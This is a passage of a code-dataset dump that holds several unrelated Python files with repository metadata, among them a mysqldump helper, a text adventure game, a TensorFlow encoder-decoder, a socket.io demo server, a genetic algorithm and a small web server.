INTO` statements will exclude column names from\n # the output, which are required for sanitation.\n \"--complete-insert\",\n\n # This enables use for \"exteded inserts\" where multiple rows of a table\n # are included in a single `INSERT INTO` statement (contents of the\n # entire table even, if it's within limits). We use it to increase the\n # performance of the sanitation and to decrease the dump size.\n \"--extended-insert\",\n\n # This makes the `mysqldump` to attempt to limit size of a single line\n # into 10 megabytes. We use it to reduce memory consumption.\n \"--net_buffer_length=10240\",\n\n # Hostname of the database to connect into, should be always present in\n # the parsed database URL.\n \"-h\",\n url.hostname,\n ]\n env = {}\n\n if url.port is not None:\n args.extend((\"-P\", six.text_type(url.port)))\n\n if url.username:\n args.extend((\"-u\", url.username))\n\n if url.password:\n env[\"MYSQL_PWD\"] = url.password\n\n if len(url.path) < 2 or not url.path.startswith(\"/\"):\n raise ValueError(\"Name of the database is missing from the URL\")\n\n args.append(url.path[1:])\n\n return args, env\n\n\nMYSQL_NULL_PATTERN = re.compile(r\"^NULL$\", re.IGNORECASE)\nMYSQL_BOOLEAN_PATTERN = re.compile(r\"^(TRUE|FALSE)$\", re.IGNORECASE)\nMYSQL_FLOAT_PATTERN = re.compile(r\"^[+-]?\\d*\\.\\d+([eE][+-]?\\d+)?$\")\nMYSQL_INT_PATTERN = re.compile(r\"^\\d+$\")\nMYSQL_STRING_PATTERN = re.compile(r\"'(?:[^']|''|\\\\')*(? Optional[ListNode]:\n if head is None:\n return head\n rabbit = head.next\n turtle = head\n while rabbit is not None:\n if rabbit.val == val:\n turtle.next = rabbit.next\n rabbit = rabbit.next\n else:\n turtle = turtle.next\n rabbit = rabbit.next\n if head.val == val:\n head = head.next\n return head\n","repo_name":"evangelato/LeetcodePatternsAdventure","sub_path":"Easy/203_remove_linked_list_elements.py","file_name":"203_remove_linked_list_elements.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33635864124","text":"from Adventurer import Adventurer\nfrom Monster import Monster\nfrom SmallMonster import SmallMonster\nfrom MediumMonster import MediumMonster\nfrom Weapon import Weapon\nfrom EnergyPotion import EnergyPotion\nfrom HPpotion import HPpotion\nfrom Shield import Shield\nfrom Shop import Shop\n\nclass Game():\n \"\"\"This is the Game class, all the other classes except main interact in this class\n\n Attributes:\n adventurer (Adventurer): The adventurer in the game.\n enemyList (list): The enemies (monsters) of the game.\n shop (Shop): The shop of the game.\n quit (Boolean): If the player has quit the game or not, the initial value is False.\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructor method for Game.\n\n Args:\n none.\n \"\"\"\n self._adventurer = 0\n self._enemyList = []\n self._shop = Shop()\n self._quit = False\n\n def printIntro(self):\n \"\"\"\n This function prints the introduction of the game.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n print('----Welcome to the Zork-style text-based game!----')\n print('')\n print('In this game, you will take on the role of an adventurer, ')\n print('who must battle through three stages filled with challenging enemies. ')\n print('To succeed, you will need to gain experience and money, ')\n print('which can be used to level up your character and purchase helpful items.')\n print('')\n print('To navigate through the game, you will be presented with a main menu ')\n print('where you can choose from six different operations: ')\n print('\"Go to the battle field\" \"Recover your HP or energy\" \"Go to the shop\" \"Show my backpack\" \"Show my status\" and \"Exit the game\" ')\n print('Use the arrow keys or type the corresponding number to select your desired option.')\n print('')\n print('During battles, you will need to select your actions carefully to defeat your opponents ')\n print('while preserving your own health and energy levels. ')\n print('You can choose to attack, recover, or run away. ')\n print('Use your strategic thinking to win the battle and move on to the next stage.')\n print('')\n print('Do not forget to use the \"recover\" operation to replenish your health and energy levels when necessary, ')\n print('and the \"shop\" operation to purchase helpful items such as weapons, shields, and potions. ')\n print('Keep track of your items using the \"bag\" operation and monitor your progress using the \"status\" operation.')\n print('')\n print('Good luck on your adventure!')\n print('----------------------------')\n\n def attack(self, monster):\n \"\"\"\n This function allows a round of attacking each other\n\n Args:\n monster (Monster): The monster in the attack.\n\n Returns:\n none.\n \"\"\"\n # The adventurer makes the attack first\n self._adventurer.attack(monster)\n # If the monster and adventurer are both alive, the monster attacks back\n if monster.getHp() > 0 and self._adventurer.getStatus():\n print(\"Watch out! The enemy is trying to attack you! \")\n print(\"\")\n self._adventurer.attacked(monster)\n\n def battle(self, gameStage):\n \"\"\"\n This function allows the battle in a specific game field.\n\n Args:\n gameStage (str): The name of the battle-field/stage.\n\n Returns:\n none.\n \"\"\"\n\n print(\"Hello adventurer, here is the enemy you are going to challenge: \")\n print(\"----------------------------------------------------------------\")\n self.refreshEnemy()\n m = next(filter(lambda i: str(i.getLevel()) == gameStage, self._enemyList), Monster(\"1\", 1, 1, 1, 1))\n\n statusA = self._adventurer.getStatus()\n statusM = m.getStatus()\n\n # Display the monster information\n m.display()\n print(\"----------------------------------------------------------------\")\n # The battle continues if nobody dies\n while statusA and statusM:\n print(\"Which action would you like to take: 1. Attack; 2. Recover; 3. Escape.\")\n # print(\"Please enter your option: \")\n invalidInput = False\n while not invalidInput:\n choice = input(\"Please enter your option: \")\n print(\"\")\n try:\n choice = int(choice)\n if choice in range(1, 4):\n invalidInput = True\n if choice == 1:\n self._adventurer.back()\n self.attack(m)\n # Update the status\n statusA = self._adventurer.getStatus()\n statusM = m.getStatus()\n if choice == 2:\n self._adventurer.usePotion()\n if choice == 3:\n self._adventurer.escape()\n return\n except ValueError:\n print(\"Invalid input, please try again.\")\n # If the adventurer is alive and the monster is dead\n if statusA and not statusM:\n print(\"You won the battle!\")\n # If it's not the final stage,\n # update the obtained experience, money, item from the triumph,\n # and unlock the next field/stage\n if gameStage != '3':\n xp = m.getXP()\n g = m.getGold()\n self._adventurer.updateExperience(xp)\n self._adventurer.updateMoney(g)\n if type(m) == MediumMonster:\n item = m.getEquipment()\n print(\"You won \", item.getName())\n self._adventurer.addItem(item)\n newGameStage = {\n 1.1: 1.2,\n 1.2: 2.1,\n 2.1: 2.2,\n 2.2: 3\n }.get(float(gameStage))\n if newGameStage is not None:\n self._adventurer.addUnlocked(str(newGameStage))\n else:\n self._adventurer.addUnlocked(\"4\") # 4 indicates victory in the whole game\n # Finds the corresponding next stage based on the current game stage gameStage\n # adds it to the player object's list of unlocked stages.\n # If no value for the next stage is found, assume the game is complete and\n # add the string representing the victory status to the list of unlocked stages\n\n\n def generatePlayer(self):\n \"\"\"\n This function generate the adventurer, allow user to put the name.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n adventurerName = input(\"Please enter your name:\")\n # print('----------------------------')\n self._adventurer = Adventurer(adventurerName)\n\n def generateEnemiesItems(self):\n \"\"\"\n This function generates enemies and items.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n hpPotion1 = HPpotion(name='HP Potion(small)', weight=10, price=100, hpRegeneration=100) # name, weight, price\n hpPotion2 = HPpotion('HP Potion(large)', 15, 200, 300)\n energyPotion1 = EnergyPotion('Energy Potion(small)', 10, 100, 100)\n energyPotion2 = EnergyPotion('Energy Potion(large)', 15, 200, 300)\n\n fist = Weapon('Your fist', 0, 0, 20, 10) # name, weight, price, attack_power, energyConsumption\n # The initial item in the backpack is fist\n self._adventurer._backpack.append(fist)\n\n weapon1 = Weapon('Dagger', 16, 10, 80, 15)\n weapon2 = Weapon('Sword', 20, 100, 50, 10)\n shield1 = Shield('Wooden Shield', 10, 100, 5) # name, weight, price, defencePower\n shield2 = Shield('Ironclad Defender', 20, 200, 10)\n\n self._enemyList.append(SmallMonster('Goblin', 50, 100, 10, 1.1, 100)) # name, hp, xp, attack_power, level, gold\n self._enemyList.append(SmallMonster('Skeleton', 70, 200, 20, 1.2, 200))\n self._enemyList.append(MediumMonster('Giant spider', 150, 400, 30, 2.1, 500,\n weapon1)) # name, hp, xp, attack_power, level, gold, equipment: Item\n self._enemyList.append(MediumMonster('Werewolf', 250, 200, 40, 2.2, 600, shield1))\n self._enemyList.append(Monster('Vampire', 300, 200, 50, 3))\n\n itemList = [hpPotion1, hpPotion2, energyPotion1, energyPotion2, weapon2, shield2]\n for i in itemList:\n self._shop.addItem(i)\n\n def refreshEnemy(self):\n \"\"\"\n This function refreshes the enemyList, it is called every time after the battle.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n self._enemyList = []\n weapon1 = Weapon('Dagger', 20, 10, 80, 15)\n shield1 = Shield('Wooden Shield', 10, 100, 5)\n self._enemyList.append(SmallMonster('Goblin', 50, 100, 10, 1.1, 100)) # name, hp, xp, attack_power, level, gold\n self._enemyList.append(SmallMonster('Skeleton', 70, 200, 20, 1.2, 200))\n self._enemyList.append(MediumMonster('Giant spider', 150, 400, 30, 2.1, 500,\n weapon1)) # name, hp, xp, attack_power, level, gold, equipment: Item\n self._enemyList.append(MediumMonster('Werewolf', 250, 200, 40, 2.2, 600, shield1))\n self._enemyList.append(Monster('Vampire', 300, 200, 50, 3))\n\n\n def initialize(self):\n \"\"\"\n This function initializes the game, generating adventurer, monsters, shop, and items.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n self.printIntro()\n self.generatePlayer()\n self.generateEnemiesItems()\n\n\n def checkWinLose(self):\n \"\"\"\n This function checks the current status of the game.\n\n Args:\n none.\n\n Returns:\n int: represent different status of the game.\n \"\"\"\n # There are 5 fields in the game in total,\n # if the length pf unlocked list exceeds 5, that's a sign of victory\n if len(self._adventurer.getUnlocked()) == 6:\n return 1 # unlock all the list, win\n elif self._quit == True:\n return 2 # quit, lose\n elif self._adventurer.getStatus() == False:\n return 3 # adventurer die, lose\n else:\n return 4\n\n def showOperation(self):\n \"\"\"\n This function shows the operations the adventurer can make in the main menu.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n print('----------------MENU----------------')\n print(\"1. Go to the battle field.\")\n print(\"2. Recover your HP or energy.\")\n print(\"3. Go to the shop.\")\n print(\"4. Show my backpack.\")\n print(\"5. Show my status.\")\n print(\"6. Exit the game.\")\n\n def exit(self):\n \"\"\"\n This function allows the adventurer to quit the game.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n self._quit = True\n\n def shop(self):\n \"\"\"\n This function makes the adventurer enter the shop,\n sell or buy items in the shop.\n\n Args:\n none.\n\n Returns:\n Function: getMain() or shop().\n \"\"\"\n print(\"-------------------------------------------------------------------------\")\n print(\"Hello adventurer! Welcome to the Wonder Shop, do you want to sell or buy?\")\n print(\"1. I want to sell something.\")\n print(\"2. I want to buy something.\")\n print(\"3. Exit.\")\n chosen = input(\"Please enter your option:\")\n if chosen == str(1):\n self._adventurer.sellItem()\n elif chosen == str(2):\n self._shop.display()\n choice = input(\"Please enter the index of item you want, if you want to exit, enter others:\")\n try:\n choice = int(choice)\n if choice in range(0, self._shop.getLen()):\n self._adventurer.buy(self._shop.getItem(choice))\n else:\n return self.getMain()\n except ValueError:\n return self.getMain()\n elif chosen == str(3):\n return self.getMain()\n else:\n print(\"Invalid input, please try again.\")\n return self.shop()\n\n\n def getMain(self):\n \"\"\"\n This function leads to the main menu.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n print(\"Welcome to the main menu! Here you can choose one of the options below:\")\n self.showOperation()\n print(\"--------------------------------------\")\n operation = input(\"Which option would you like to choose:\")\n print(\"\")\n if len(self._adventurer.getUnlocked()) == 6:\n return\n elif operation == str(1):\n print(\"Battle fields you have unlocked:\")\n print(self._adventurer.getUnlocked())\n print(\"\")\n invalidInput = True\n while invalidInput:\n stageSelected = input(\"Please enter the level you want to challenge:\")\n print(\"\")\n if stageSelected in self._adventurer.getUnlocked():\n invalidInput = False\n self.battle(str(stageSelected))\n if self._adventurer.getStatus():\n return\n\n elif operation == str(2):\n self._adventurer.usePotion()\n return\n elif operation == str(3):\n self.shop()\n return\n elif operation == str(4):\n self._adventurer.displayBackpack()\n return\n elif operation == str(5):\n self._adventurer.display()\n return\n elif operation == str(6):\n self.exit()\n else:\n print('Invalid input, please try again.')\n\n","repo_name":"Siyan-Luo/Advanced-Programming-Concept","sub_path":"Project/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":14522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36519347670","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nfrom tensorflow.python.layers.core import Dense\nfrom tensorflow.contrib import rnn\n\n# Write your code here\nclass Model(object):\n def __init__(self, max_len=40, emb_dim=128, hidden_dim=256, vocab_size=10000, use_clip=True, learning_rate=0.01, end_token=0):\n self.initializer = tf.random_uniform_initializer(-0.1, 0.1)\n self.max_len = max_len\n self.emb_dim = emb_dim\n self.hidden_dim = hidden_dim\n\n self.vocab_size = vocab_size\n self.use_clip = use_clip\n self.learning_rate = learning_rate\n self.end_token = end_token\n\n # Placeholder\n self.x = tf.placeholder(dtype=tf.int32, shape=(None, max_len))\n self.x_len = tf.placeholder(dtype=tf.int32, shape=(None, ))\n self.x_len = self.x_len - 1\n self.batch_max_len = tf.reduce_max(self.x_len)\n\n # sequence mask for different size\n self.batch_size = tf.shape(self.x)[0]\n self.encoder_input = self.x[:,:]\n self.decoder_output = self.x[:,:]\n self.x_mask = tf.sequence_mask(lengths=self.x_len, maxlen=self.batch_max_len, dtype=tf.float32)\n\n # Embedding\n self.emb_W = self.get_var(name='emb_W', shape=[self.vocab_size, self.emb_dim])\n self.input_emb = tf.nn.embedding_lookup(self.emb_W, self.encoder_input)\n self.output_emb = tf.nn.embedding_lookup(self.emb_W, self.decoder_output)\n\n self.build_model()\n self.build_loss()\n self.build_opt()\n\n def build_model(self):\n # Encoder cell\n encoder_cell = tf.nn.rnn_cell.BasicLSTMCell(self.hidden_dim)\n\n # Dynamic encoding\n enc_output, self.enc_states = tf.nn.dynamic_rnn(cell=encoder_cell, inputs=self.input_emb,\n sequence_length=self.x_len, dtype=tf.float32)\n\n # Output layer\n self.out_layer = Dense(self.vocab_size, dtype=tf.float32, name='out_layer')\n\n # Decoder cell\n decoder_cell = tf.nn.rnn_cell.BasicLSTMCell(self.hidden_dim)\n\n helper = tf.contrib.seq2seq.TrainingHelper(self.output_emb, self.x_len, time_major=False)\n decoder = tf.contrib.seq2seq.BasicDecoder(decoder_cell, helper, self.enc_states, output_layer=self.out_layer)\n outputs, states, length = tf.contrib.seq2seq.dynamic_decode(decoder=decoder, maximum_iterations=self.max_len)\n self.logits = outputs.rnn_output\n self.output = tf.argmax(self.logits, 2)\n\n def build_loss(self):\n target_labels = self.decoder_output[:, :self.batch_max_len]\n self.cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=target_labels, logits=self.logits)\n self.loss = tf.reduce_sum(self.cross_entropy * self.x_mask) / (tf.reduce_sum(self.x_mask) + 1e-10)\n\n def build_opt(self):\n # define optimizer\n optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)\n grad, var = zip(*optimizer.compute_gradients(self.loss))\n\n # gradient clipping\n def clipped_grad(grad):\n return [None if g is None else tf.clip_by_norm(g, 2.5) for g in grad]\n\n if self.use_clip:\n grad = clipped_grad(grad)\n\n self.update = optimizer.apply_gradients(zip(grad, var))\n\n def leaky_relu(self, x):\n return tf.maximum((x), 0.1*(x))\n\n def get_var(self, name='', shape=None, dtype=tf.float32):\n return tf.get_variable(name, shape, dtype=dtype, initializer=self.initializer)\n\n\n def save(self, sess, global_step=None):\n var_list = [var for var in tf.all_variables()]\n saver = tf.train.Saver(var_list)\n save_path = saver.save(sess, save_path=\"models/encdec\", global_step=global_step)\n print(' * model saved at \\'{}\\''.format(save_path))\n\n # Load whole weights\n def restore(self, sess):\n print(' - Restoring variables...')\n var_list = [var for var in tf.all_variables()]\n saver = tf.train.Saver(var_list)\n saver.restore(sess, \"models/encdec\")\n print(' * model restored ')","repo_name":"leekeon/AI","sub_path":"2. SKKU/4.NLP_Deep_Learning/day2/2-3. RNN Encoder Decoder/encoder_decoder_model.py","file_name":"encoder_decoder_model.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21004140608","text":"\"\"\"\nScript to work out the statistical signficance of the inner region. \n\"\"\"\n\nfrom rich.progress import track\nimport numpy as np\nimport pylab as plt\nfrom scipy.stats import poisson, norm\nfrom astropy.cosmology import FlatLambdaCDM\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\nfrom plot_radial_distribution import Mask\n\n\nREDSHIFT_QSO = 6.9\nCOSMO = FlatLambdaCDM(H0=70, Om0=0.3)\nARCSEC_PER_KPC = COSMO.arcsec_per_kpc_comoving(REDSHIFT_QSO)\nDEG_PER_MPC = ARCSEC_PER_KPC.to(u.deg / u.Mpc)\nRA_QSO = (23 + (48/60) + (33.34/3600)) * (360/24) * u.deg\nDEC_QSO = (30 + (54/60) + (10.0/3600)) * -1 *u.deg\nqso_position = SkyCoord(ra = RA_QSO, dec = DEC_QSO)\n\ndef calculate_distances_to_quasar(ra_array: np.ndarray, dec_array: np.ndarray):\n \"\"\"Works out the distances to the quasar for a given ra and dec range.\"\"\"\n coords = SkyCoord(ra= ra_array*u.deg, dec = dec_array*u.deg)\n return qso_position.separation(coords)\n\ndef count_inner_outer(ra_array: np.ndarray, dec_array: np.ndarray, distance_deg: float) -> tuple:\n \"\"\"Calculates the number of sources within the deg distance and how many are outside of it.\"\"\"\n distances = calculate_distances_to_quasar(ra_array, dec_array)\n results = distances < distance_deg\n inner = len(np.where(results == True)[0])\n outer = len(np.where(results == False)[0])\n\n return inner, outer\n\ndef calculate_area_ratio(mask: Mask, radius: float) -> float:\n \"\"\"Works out the scaling factor for the counts.\"\"\"\n radius_pixels = radius / mask.deg_per_pix\n center = mask.wcs.world_to_pixel_values(RA_QSO.value, DEC_QSO.value)\n outer_area = mask.calculate_area(center, radius_pixels, 100000)\n inner_area = mask.calculate_area(center, 0, radius_pixels)\n print(outer_area)\n print(inner_area)\n ratio = inner_area/outer_area\n return ratio.value\n\nif __name__ == '__main__':\n decam = Mask('DECAM_MASK.fits')\n ra, dec = np.loadtxt('candidates_e.txt', unpack=True)\n\n distances = np.arange(40, 80, 5) *u.Mpc\n\n sigmas = []\n for distance in track(distances):\n inner_region_distance_deg = DEG_PER_MPC * distance\n inner, outer = count_inner_outer(ra, dec, inner_region_distance_deg)\n ratio = calculate_area_ratio(decam, inner_region_distance_deg)\n expected_inner = outer * ratio\n\n probability = poisson.cdf(inner, expected_inner)\n sigmas.append(norm.ppf(probability))\n\n plt.plot(distances, sigmas)\n plt.show()\n","repo_name":"TrystanScottLambert/DECam_Photometry","sub_path":"poissin_significance.py","file_name":"poissin_significance.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41202734601","text":"import asyncio\r\nimport socketio\r\nimport uvicorn\r\n\r\nPORT = 63047\r\ncount = 0\r\nsio = socketio.AsyncServer(async_mode='asgi')\r\napp = socketio.ASGIApp(sio)\r\ntick_queue = asyncio.Queue()\r\ntock_queue = asyncio.Queue()\r\n\r\n@sio.event\r\nasync def connect(sid, environ, auth):\r\n print('[%s]: connected' % sid)\r\n\r\n@sio.event\r\nasync def disconnect(sid):\r\n print('[%s]: disconnected' % sid)\r\n\r\n@sio.event\r\nasync def client_said(sid, data):\r\n global count\r\n message = 'This is server response #%d.' % count\r\n count += 1\r\n print('[%s]: %s' % (sid, data['message']))\r\n await sio.emit('server_said', { 'message': message })\r\n\r\nasync def tick_dequeue():\r\n while True:\r\n await asyncio.sleep(3)\r\n tick = await tick_queue.get()\r\n await sio.emit('tick', tick)\r\n print('tick_dequeue() qsize=%d' % tick_queue.qsize(), True)\r\n\r\nasync def tick_enqueue():\r\n print('tick_enqueue() start', True)\r\n while True:\r\n await asyncio.sleep(1)\r\n await tick_queue.put({\r\n 'security_code': '2330.TW',\r\n 'close': 601.15\r\n })\r\n print('tick_enqueue()', True)\r\n\r\nasync def init_task():\r\n print('init_task()', flush=True)\r\n for i in range(100):\r\n await tock_queue.put({ 'foo': 'bar%d' % i })\r\n\r\nasync def loop_task():\r\n while True:\r\n print('loop_task()', flush=True)\r\n tock = await tock_queue.get()\r\n await sio.emit('tock', tock)\r\n await sio.sleep(1)\r\n\r\n# 非同步背景工作如果放在 main() 會沒作用\r\n# 如果透過 server.py 間接執行也會沒作用\r\n# 也許是存在 namespace 問題\r\nsio.start_background_task(init_task)\r\nsio.start_background_task(loop_task)\r\n\r\n# 間接執行的絕對位置\r\ntarget = 'servers.asgi_server:app'\r\n\r\ndef main():\r\n print('==============================')\r\n print(' async_mode = asgi')\r\n print('==============================')\r\n uvicorn.run(target, host=\"127.0.0.1\", port=PORT, log_level=\"info\")\r\n\r\nif __name__ == '__main__':\r\n # 直接執行的絕對位置\r\n target = 'asgi_server:app'\r\n main()\r\n","repo_name":"tacosync/skcomws","sub_path":"sandbox/servers/asgi_server.py","file_name":"asgi_server.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7294356552","text":"import socket \r\nimport os,sys \r\nimport web_frame\r\n\r\nclass WebServer:\r\n def __init__(self):\r\n self.__fd_ser = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n\r\n # 构建HTTP数据\r\n def __formatHttp(self):\r\n response_line =self.response_line.encode()\r\n\r\n response_body = self.response_body\r\n\r\n response_header = f\"Content-Length:{len(response_body)}\\r\\n\"\r\n for kv in self.response_header:\r\n response_header += f\"{kv[0]}:{kv[1]}\\r\\n\"\r\n response_header = response_header.encode()\r\n response_blank = self.response_blank.encode()\r\n\r\n return response_line + response_header + response_blank + response_body\r\n\r\n def __getReqPath(self,recv_d):\r\n # 得到请求行 \r\n idx = recv_d.find(\"\\r\\n\")\r\n requestLine = recv_d[:idx]\r\n return requestLine.split(\" \")[1]\r\n\r\n # 解析 HTTP数据 \r\n def __parseHttp(self,recv_d):\r\n path = self.__getReqPath(recv_d)\r\n env = {}\r\n env[\"path\"] = path\r\n return env\r\n \r\n def __handleRequest(self,fd_conn):\r\n recv_d = fd_conn.recv(1024).decode() \r\n env = self.__parseHttp(recv_d)\r\n self.response_body = web_frame.application(env,self.start_response)# env:dict \r\n fd_conn.send(self.__formatHttp())\r\n \r\n def start_response(self,status,response_header):# status:str,response_header:[(),()]\r\n self.response_line = f\"HTTP/1.1 {status}\\r\\n\"\r\n self.response_header = response_header\r\n self.response_blank = \"\\r\\n\"\r\n\r\n def run(self,ip=\"\",port=80):\r\n self.__fd_ser.bind((ip,port))\r\n self.__fd_ser.listen()\r\n while True:\r\n fd_conn,cli_addr = self.__fd_ser.accept()\r\n self.__handleRequest(fd_conn)\r\n fd_conn.close()\r\n\r\n self.__fd_ser.close()\r\n\r\nif __name__ ==\"__main__\":\r\n os.chdir(os.path.dirname(sys.argv[0]))\r\n server = WebServer()\r\n #server.run(\"127.0.0.1\",8080)\r\n server.run() ","repo_name":"zzzcb/robot","sub_path":"01python_advanced/03网络编程/day03web服务器和web框架/02自定义遵守WSGI接口的简单web服务器和简单web框架/server_遵守WSGI接口.py","file_name":"server_遵守WSGI接口.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"19781715925","text":"import math, random, string\nimport numpy as np\n\ntarget = \"kuldeeplovesgeneticalgorithm\"\n\ndef diff(s1, s2) :\n\tsum = 0\n\tfor i in range(len(s1)) :\n\t\tsum += (ord(s1[i])-ord(s2[i]))**2\n\treturn math.sqrt(sum)\n\ndef getRandomString() :\n\t# s = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in range(N))\n\t# return s.replace('[0-9]', ' ')\n\ts = \"\"\n\tfor i in range(len(target)) :\n\t\tif(target[i] != ' ') :\n\t\t\trandom_char = np.random.randint(ord('a'), ord('z'))\n\t\t\ts += chr(random_char)\n\t\t# else :\n\t\t# \ts += ' '\n\treturn s\n\n# selection\ndef selection(offsprings) :\n\tbest = None\n\tbest2 = None\n\tmin_val = 1e8\n\tmin_val2 = 1e8\n\tfor offspring in offsprings : \n\t\tval = diff(offspring, target) \n\t\tif(val < min_val) :\n\t\t\tmin_val = val\n\t\t\tbest = offspring\n\t\telif(val < min_val2) :\n\t\t\tmin_val2 = val\n\t\t\tbest2 = offspring\n\n\tif(best2 == None) : best2 = best\n\treturn best, best2\n\n# single point crossover\ndef crossover(s1, s2) :\n\tl1 = np.random.randint(len(s1))\n\tl2 = np.random.randint(len(s1))\n\toffspring1 = s1[:l1] + s2[l1:]\n\toffspring2 = s2[:l2] + s1[l2:]\n\treturn offspring1, offspring2\n\n# mutation\ndef mutation(s) :\n\trand_index1 = np.random.randint(len(s))\n\trand_index2 = np.random.randint(len(s))\n\tsList = list(s)\n\t# sList[rand_index1], sList[rand_index2] = sList[rand_index2], sList[rand_index1]\n\tsList[rand_index1] = chr(np.random.randint(ord('a'), ord('z')))\n\treturn ''.join(sList)\n\ndef generatePopulation(n, k) :\n\tpopulations = [] \n\tfor i in range(n) :\n\t\tpopulation.append(getRandomString(k))\n\treturn populations\n\ndef v(s1, s2) :\n\tif(np.random.rand() >= 0.5) :\n\t\ts1, s2 = crossover(s1, s2)\n\n\tpopulations = []\n\tfor i in range(len(s1)) :\n\t\tif(np.random.rand() >= 0.5) :\n\t\t\tpopulations.append(mutation(s1))\n\t\telse :\n\t\t\tpopulations.append(s1)\n\t\tif(np.random.rand() >= 0.5) :\n\t\t\tpopulations.append(mutation(s2))\n\t\telse :\n\t\t\tpopulations.append(s2)\n\n\treturn selection(populations)\n\nparent1 = getRandomString()\nparent2 = getRandomString()\n\nprint(\"parent1 = \", parent1)\nprint(\"parent2 = \", parent2)\niter = 0\nwhile(iter < 1000) :\n\tif((parent1 == target) or (parent2 == target)) :\n\t\tprint(\"Final parent1, Final parent2 = \", parent1, parent2)\n\t\tprint(\"Reached in iter\", iter)\n\t\tbreak\n\tprint(\"parent1, parent2 = \", parent1, parent2)\n\tparent1, parent2 = v(parent1, parent2)\n\titer += 1\n\nprint(\"end\")","repo_name":"kuldeep725/AI","sub_path":"Genetic Algorithm/genetic_algo.py","file_name":"genetic_algo.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13666452759","text":"from flask_restful import (abort)\n\n\ndef validate_data(user):\n error_msg = []\n if \"email\" not in user:\n error_msg.append(\"email must be provided\")\n if \"provider\" not in user:\n error_msg.append(\"social login provider must be provided\")\n if \"token\" not in user:\n error_msg.append(\"token must be provided\")\n return error_msg\n\n\ndef process_social_login(user):\n msg = validate_data(user)\n if len(msg) > 0:\n abort(403, message=msg)\n\n user_dict = {\n \"email\": user[\"email\"], \"id\": user[\"id\"],\n \"provider\": user[\"provider\"], \"first_name\": None,\n \"last_name\": None\n }\n\n if \"name\" in user:\n if \" \" in user['name']:\n names = user['name'].split(' ')\n user_dict[\"first_name\"] = names[0]\n user_dict[\"last_name\"] = names[1]\n else:\n user_dict[\"first_name\"] = user['name']\n\n print('lookup: {}'.format(user['email']))\n# other fields\n# id :\n# full name:\n# email\n# provider\n# token\n#\n\n\ndef process_social_logout(user):\n print(user)\n","repo_name":"BeeRaspberry/bee_api","sub_path":"bee_api/classes/user/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30906525569","text":"from conductr_cli.exceptions import MalformedBundleUriError\nfrom conductr_cli.resolvers.schemes import SCHEME_BUNDLE\n\n\nDEFAULT_ORG = 'typesafe'\nDEFAULT_REPO_BUNDLE = 'bundle'\nDEFAULT_REPO_BUNDLE_CONFIGURATION = 'bundle-configuration'\nURN_BUNDLE = '{}:'.format(SCHEME_BUNDLE)\n\n\ndef parse_bundle(uri):\n urn, rest = split_to_urn_and_rest(uri)\n org, repo, package = split_to_org_repo_package(rest, default_repo=DEFAULT_REPO_BUNDLE)\n package_name, tag, digest = split_package_to_parts(package)\n return urn, org, repo, package_name, tag, digest\n\n\ndef parse_bundle_configuration(uri):\n urn, rest = split_to_urn_and_rest(uri)\n org, repo, package = split_to_org_repo_package(rest, default_repo=DEFAULT_REPO_BUNDLE_CONFIGURATION)\n package_name, tag, digest = split_package_to_parts(package)\n return urn, org, repo, package_name, tag, digest\n\n\ndef split_to_urn_and_rest(uri):\n if len(uri.strip()) < 1:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n\n if uri.startswith('urn:'):\n if uri.startswith(URN_BUNDLE):\n return URN_BUNDLE, uri.replace(URN_BUNDLE, '')\n else:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n else:\n return URN_BUNDLE, uri\n\n\ndef split_to_org_repo_package(uri, default_repo):\n if len(uri.strip()) < 1:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n\n parts = uri.split('/')\n empty_parts = [part for part in parts if not part]\n if len(empty_parts) > 0:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n\n if len(parts) == 3:\n return parts\n elif len(parts) == 2:\n return DEFAULT_ORG, parts[0], parts[1]\n elif len(parts) == 1:\n return DEFAULT_ORG, default_repo, parts[0]\n else:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n\n\ndef split_package_to_parts(package):\n if ':' in package:\n package_name, version = package.split(':')\n if '-' in version:\n tag, digest = version.rsplit('-', 1)\n return package_name, tag, digest\n else:\n return package_name, version, None\n else:\n return package, None, 